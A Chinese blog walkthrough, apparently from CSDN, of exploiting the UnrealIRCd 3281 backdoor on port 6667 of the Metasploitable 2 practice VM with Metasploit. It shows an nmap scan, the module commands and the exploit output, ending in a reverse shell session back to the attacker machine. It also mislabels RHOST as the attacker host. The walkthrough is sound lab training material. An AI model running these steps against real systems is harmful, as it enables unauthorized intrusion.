msf利用Metasploitable 2 漏洞之6667端口之unreal_ircd_3281_backdoor

本文介绍如何使用Metasploit框架针对Metasploitable系统中的unreal_ircd_3281_backdoor漏洞进行渗透测试。通过启动虚拟机并确定目标IP后,利用Nmap扫描开放端口,并选择合适模块实施攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Metasploitable漏洞演练系统 是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,这方便大家对于msf的学,以下以6667端口的unreal_ircd_3281_backdoor进行攻击。

可以在虚拟机中启动(登录密码和账号都是msfadmin)


查看其ip:    ifconfig


地址为:192.168.127.145

然后在kali linux中进行渗透:

启动msf


然后nmap 192.168.127.145查看开放端口

exec: nmap 192.168.127.145

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-05 13:29 CST
Nmap scan report for 192.168.127.145
Host is up (0.00015s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown

MAC Address: 00:0C:29:E4:E7:DD (VMware)

因为作为靶机,所以端口自然就是很多,但是在实际中,不可能开放这么多的端口的。

然后我们要利用的是

6667端口之unreal_ircd_3281_backdoor

所以搜索: search unreal_ircd_3281_backdoor


然后使用:use exploit/unix/irc/unreal_ircd_3281_backdoor


再执行show options


设置攻击机:set RHOST 192.168.127.145


然后执行:exploit

Started reverse TCP double handler on 192.168.127.144:4444
[*] 192.168.127.145:6667 - Connected to 192.168.127.145:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.127.145:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uacFt7kPS2PL19yF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uacFt7kPS2PL19yF\r\n"
[*] Matching...
[*] A is input...

[*] Command shell session 1 opened (192.168.127.144:4444 -> 192.168.127.145:36349) at 2018-05-05 13:38:50 +0800

权限就已经拿到了:










评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值